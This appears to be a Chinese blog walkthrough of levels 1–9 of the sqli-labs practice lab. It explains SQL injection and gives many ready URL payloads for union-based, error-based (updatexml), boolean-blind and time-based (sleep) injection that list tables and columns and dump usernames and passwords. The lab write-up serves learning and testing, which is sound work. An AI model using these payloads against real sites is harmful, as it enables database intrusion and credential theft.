sql注入---sqli靶场1-9

1.什么是SQL注入

SQL注入是比较常见的网络攻击方式之一,它不是利用操作系统的BUG来实现攻击,而是针对程序员编写时的疏忽,通过SQL语句,实现无账号登录,甚至篡改数据库

2.sql注入原理

攻击者注入一段包含注释符的SQL语句,将原来的语句的一部分注释,注
释掉的部分语句不会被执行

上面注入位置在‘ ’中,输入

会变成'id=1' 注入语句-- '用‘补全前面的单引号,再用--+注释掉后面包括单引号的语句确保注入语句正常运行不会报错

也可以在后面加单引号,补全单引号。rfc-1738标准中+会被空格替代

同样的注释符号还有//  /**/ 

#井号不能被识别,需要编码

3.sql注入一般步骤

 1.求闭合字符

 2.选择注入模式

 3.爆数据库名

 4.爆表明

 5.爆列名

 6.爆字段

4.靶场练习

less-1

1.求闭合字符

输入\后面是单引号

单引号报错

极有可能是单引号闭合 --+不报错

2.爆库名

order by查询列数,为3时报错,4报错,所以当前数据库3列

联表查询,查看数据库,id为-1时查询失败,允许执行后面的查询语句

3.爆表名


 id=-1%27%20union%20select%201,2,group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27security%27%20--+     
//使用group_concat列出所有表名

4.爆列名

id=-1%27%20union%20select%201,2,group_concat(column_name)%20from%20information_schema.columns%20where%20table_schema=%27security%27%20and%20table_name=%27users%27--+

5.爆字段,获取用户密码

?id=-1%27%20union%20select%201,group_concat(id,username,password),3%20from%20users--+

less-2

1.求闭合字段

/后没有符号,很有可能数字型SQL注入

单引号报错

2.爆库名

求列数3不报错,4报错

3.爆表名

4.爆列名

5.爆字段

less-3

闭合字符是单引号括号,同上

less-4

闭合字符是双引号括号,同上

less-5 报错注入

1.求闭合字段

\后是单引号

单引号报错

判断注入点 错误不显示,正确you are in

2.爆库名

判断列数

用原方法显示you are in 

使用报错注入

?id=1%27%20and%20updatexml(1,concat(0x3a,database(),0x3a),2)--+

爆表名

?id=1%27%20and%20updatexml(1,concat(0x23,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27security%27),0x23),1)--+

4.爆列名

?id=1%27%20and%20updatexml(1,concat(0x23,(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_schema=%27security%27%20and%20table_name=%27users%27),0x23),1)--+

5.爆字段

?id=1%27%20and%20updatexml(1,concat(0x23,(select%20group_concat(username,password)%20from%20users),0x23),1)--+

less-6布尔型盲注

布尔型盲注一般步骤

求闭合字符---求当前数据库名长度---求当前数据库名对应的ASCII值---求表的数量---求表名长度---求表名对应的ASCII值---求列的数量---求列名长度---求列名对应的ASCII值---求字段的数量---求字段名长度---求字段名对应的ASCII值

1.求闭合字符”

判断注入点

2.求当前数据库名长度

3.求当前数据库名ASCII值

4.求表的数量

?id=1"%20and%20(select%20count(table_name)%20from%20information_schema.tables%20where%20table_schema=%27security%27)=4--+

5.求表名的ASCII值

?id=1"%20and%20ascii(substr((select%20table_name%20from%20information_schema.tables%20where%20table_schema=%27security%27limit%201,1),1,1))=114--+

6.求列的数量

?id=1"%20and%20(select%20count(column_name)%20from%20information_schema.columns%20where%20table_schema=%27security%27%20and%20table_name=%27users%27)=3--+

7.求列名长度

/?id=1"%20and%20length((select%20column_name%20from%20information_schema.columns%20where%20table_schema=%27security%27%20and%20table_name=%27users%27%20limit%200,1))=2--+

8.求列名ASCII值

/?id=1"%20and%20ascii(substr((select%20column_name%20from%20information_schema.columns%20where%20table_schema=%27security%27%20and%20table_name=%27users%27%20limit%200,1),1,1))=105--+

9.求字段数量

?id=1"%20and%20(select%20count(id)%20from%20users)=13--+

?id=1"%20and%20(select%20count(username)%20from%20users)=13--+

10.求字段内容

?id=1"%20and%20ascii(substr((select%20username%20from%20users%20limit%200,1),1,1))=68--+

less-7

1.求闭合字符

输入\后不能找出闭合字段,尝试其他字符发现单引号报错,输入--+也报错,说明闭合字符有单引号,最终求出闭合字符是'))

2.求库名

?id=1%27))%20order%20by%203--+                           4报错列数是3

联表查询,报错注入都不行,使用布尔型盲注

步骤同6

无列名注入

通过系统关键字 join 可建立两表之间的内连接,通过对想要查询列名所在的表与其自身

?id=-1' union select * from (select * from users as a join users b)c--+

?id=-1' union select * from (select * from users as a join users b using(id))c--+

 less---9   时间盲注

这关错误正确都是you  are in, 需要使用if和sleep观察状态

?id=1%27%20and%20if(0,1,sleep(10))--+

//如果0正确则立刻执行,否则暂停10秒

?id=1%27%20and%20if(length(database())=2,1,sleep(10))--+

      

1.求闭合字符

?id=1%27%20and%20if(1=2,1,sleep(10))--+
//当闭合字符正确时才会暂停,其余情况you  are in
//判断注入点

2.查看数据库长度

http://127.0.0.1/sqli-labs-master/Less-9/?id=1%27%20and%20if(length(database())%3E10,1,sleep(10))--+              
//暂停十秒,长度小于10
?id=1%27%20and%20if(length(database())>5,1,sleep(10))--+
//不暂停,长度大于5
/?id=1%27%20and%20if(length(database())=8,1,sleep(10))--+
长度为8

3.求数据库的ascii值

?id=1%27%20and%20if(ascii(substr((select%20database()),1,1))>115,1,sleep(10))--+
//暂停
?id=1%27%20and%20if(ascii(substr((select%20database()),1,1))<115,1,sleep(10))--+
//暂停
?id=1%27%20and%20if(ascii(substr((select%20database()),1,1))=115,1,sleep(10))--+
//正确

4.求表的个数

?id=1%27%20and%20if((select%20count(table_name)%20from%20information_schema.tables%20where%20table_schema=%27security%27)>10,1,sleep(10))--+
//暂停
?id=1%27%20and%20if((select%20count(table_name)%20from%20information_schema.tables%20where%20table_schema=%27security%27)>5,1,sleep(10))--+
//暂停
?id=1%27%20and%20if((select%20count(table_name)%20from%20information_schema.tables%20where%20table_schema=%27security%27)=4,1,sleep(10))--+
//正确

5.求表的ascii值,求表明

?id=1%27%20and%20if(ascii(substr((select%20table_name%20from%20information_schema.tables%20where%20table_schema=%27security%27limit%200,1),1,1))<100,1,sleep(10))--+
//暂停
?id=1%27%20and%20if(ascii(substr((select%20table_name%20from%20information_schema.tables%20where%20table_schema=%27security%27limit%200,1),1,1))=101,1,sleep(10))--+
//正确

6.求列数

?id=1%27%20and%20if((select%20count(column_name)%20from%20information_schema.columns%20where%20table_schema=%27security%27%20and%20table_name=%27users%27)=2,1,sleep(10))--+
//暂停
?id=1%27%20and%20if((select%20count(column_name)%20from%20information_schema.columns%20where%20table_schema=%27security%27%20and%20table_name=%27users%27)=3,1,sleep(10))--+
//正确

7.求列名

?id=1%27%20and%20if(ascii(substr((select%20column_name%20from%20information_schema.columns%20where%20table_schema=%27security%27%20and%20table_name=%27users%27limit%200,1),1,1))>115,1,sleep(10))--+
//暂停
?id=1%27%20and%20if(ascii(substr((select%20column_name%20from%20information_schema.columns%20where%20table_schema=%27security%27%20and%20table_name=%27users%27limit%200,1),1,1))>107,1,sleep(10))--+
//暂停
?id=1%27%20and%20if(ascii(substr((select%20column_name%20from%20information_schema.columns%20where%20table_schema=%27security%27%20and%20table_name=%27users%27limit%200,1),1,1))=105,1,sleep(10))--+
//正确

8.求字段

?id=1%27%20and%20if(ascii(substr((select%20username%20from%20users%20limit%200,1),1,1))=67,1,sleep(10))--+
//正确

  • 4
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值